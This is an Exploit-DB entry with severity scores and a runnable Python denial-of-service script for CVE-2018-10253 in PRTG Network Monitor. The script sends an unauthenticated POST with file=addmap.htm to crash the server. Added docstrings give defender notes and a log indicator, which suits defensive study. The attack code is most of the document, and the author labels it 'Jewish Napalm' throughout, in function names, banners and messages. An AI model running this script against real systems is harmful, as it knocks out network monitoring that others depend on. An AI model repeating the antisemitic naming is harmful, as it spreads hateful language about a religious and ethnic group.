exploitdb · Luriel · EDB-ID:44500
History: Apr 23, 2018 - 12:00 a.m.

PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)

2018-04-23 00:00:00
luriel
www.exploit-db.com
42

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.006 Low

EPSS

Percentile

79.4%

# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/

#!/usr/bin/python

import requests
import sys
import os
import re
import socket

# ANSI SGR escape sequences used to colour the terminal output below.
green = '\x1b[1;32m'   # bold green
yellow = '\x1b[1;33m'  # bold yellow
normal = '\x1b[0;0m'   # reset to default attributes
banner = """
     ā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•—    ā–ˆā–ˆā•—ā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•—  ā–ˆā–ˆā•—    ā–ˆā–ˆā–ˆā•—   ā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—  ā–ˆā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā•—     ā–ˆā–ˆā–ˆā•—   ā–ˆā–ˆā–ˆā•—
     ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā•ā•ā•ā–ˆā–ˆā•‘    ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā•ā•ā•ā–ˆā–ˆā•‘  ā–ˆā–ˆā•‘    ā–ˆā–ˆā–ˆā–ˆā•—  ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•‘     ā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā–ˆā•‘
     ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā•—  ā–ˆā–ˆā•‘ ā–ˆā•— ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘    ā–ˆā–ˆā•”ā–ˆā–ˆā•— ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•‘     ā–ˆā–ˆā•”ā–ˆā–ˆā–ˆā–ˆā•”ā–ˆā–ˆā•‘
ā–ˆā–ˆ   ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā•  ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ā•šā•ā•ā•ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•‘    ā–ˆā–ˆā•‘ā•šā–ˆā–ˆā•—ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā•ā• ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘     ā–ˆā–ˆā•‘ā•šā–ˆā–ˆā•”ā•ā–ˆā–ˆā•‘
ā•šā–ˆā–ˆā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā•šā–ˆā–ˆā–ˆā•”ā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•‘  ā–ˆā–ˆā•‘    ā–ˆā–ˆā•‘ ā•šā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•‘  ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘     ā–ˆā–ˆā•‘  ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•‘ ā•šā•ā• ā–ˆā–ˆā•‘
 ā•šā•ā•ā•ā•ā• ā•šā•ā•ā•ā•ā•ā•ā• ā•šā•ā•ā•ā•šā•ā•ā• ā•šā•ā•ā•šā•ā•ā•ā•ā•ā•ā•ā•šā•ā•  ā•šā•ā•    ā•šā•ā•  ā•šā•ā•ā•ā•ā•šā•ā•  ā•šā•ā•ā•šā•ā•     ā•šā•ā•  ā•šā•ā•ā•šā•ā•ā•ā•ā•ā•ā•ā•šā•ā•     ā•šā•ā•
"""


banner2 = """
                                            Author: @Lucas "luriel" Carmo
"""

# Runs at import time: clear the terminal through the shell's `clear` command,
# then print both banners in colour and restore the default colour.
os.system('clear')

print(green, banner, sep="")
print(yellow, banner2, sep="")
print(normal)

def check_http(url):
    """Search *url* for the literal text ``http://``.

    Returns the ``re.Match`` of the first occurrence, or ``None`` when the
    text is absent. The search is not anchored to the start of the string,
    and ``https://`` does not match.
    """
    return re.search("http://", url)

def sanitize_url(url):
    """Return *url* with ``http://`` prepended unless check_http finds it.

    The string is returned unchanged when check_http() reports a match;
    no other validation or normalisation is performed.
    """
    return url if check_http(url) else "http://" + url

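def check_server(url):
    """Probe *url* with a GET request and return the HTTP status code.

    The request uses a 4-second timeout. Connection failures, invalid URLs
    and timeouts are not handled here; they propagate as ``requests``
    exceptions for the caller to deal with.
    """
    response = requests.get(url, timeout=4)
    # main() compares this value with 404, so the status code has to be
    # returned; assigning it to a local and discarding it leaves that
    # comparison always true and the "not found" branch unreachable.
    return response.status_code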

def send_jewish_payload(url):
    """Send the one request this proof of concept consists of.

    Issues an HTTP POST to *url* with the query-string parameter
    ``file=addmap.htm``. No body, credentials or timeout are supplied and
    the response is not inspected.

    Defender notes: the header of this listing ties the request to
    CVE-2018-10253 (denial of service in PRTG Network Monitor). A POST
    without credentials carrying ``file=addmap.htm`` in the query string is
    therefore a candidate indicator in web-server or proxy logs; whether the
    same parameter occurs in legitimate traffic is not shown here, so
    validate before alerting on it. The listing title gives affected builds
    as earlier than 18.1.39.1648 while the header names 18.1.39.1648 itself;
    confirm the fixed build against the vendor advisory.
    """
    query = {'file': 'addmap.htm'}
    requests.post(url, params=query)

def main():
    """Command-line entry point: normalise the URL argument, probe it, send the request.

    Accepts one or two command-line arguments; only the first (the URL) is
    used. Any other argument count prints the usage line.

    Caveats when reading the output:
    - The "BOOOOOM" line is printed for any ``requests`` ConnectionError
      raised by either the probe or the POST, so it does not distinguish a
      host that was never reachable from a service that stopped responding.
    - NOTE(review): the 404 comparison is only meaningful if check_server()
      returns the HTTP status code.
    """
    try:
        argc = len(sys.argv)
        if argc < 2 or argc > 3:
            print(f'Example usage: ./{sys.argv[0]} http://192.168.0.10/index.htm')
            return

        try:
            target = sanitize_url(sys.argv[1])
            print(' [#] LOADING!')
            if check_server(target) == 404:
                print(' [!] Server shutdown or not found')
            else:
                send_jewish_payload(target)
        # Handler order is kept as in the original: a connect timeout is a
        # subclass of both ConnectionError and Timeout, so the first match wins.
        except requests.exceptions.ConnectionError:
            print(' [~] BOOOOOM! PRTG Server has been exploded!')
        except requests.exceptions.InvalidURL:
            print(' [!] Invalid URL')
        except requests.exceptions.Timeout:
            print(' [!] Connection Timeout\n')
    except KeyboardInterrupt:
        print(' [!] Jewish Napalm Canceled;.....[./]')


if __name__ == '__main__':
    main()
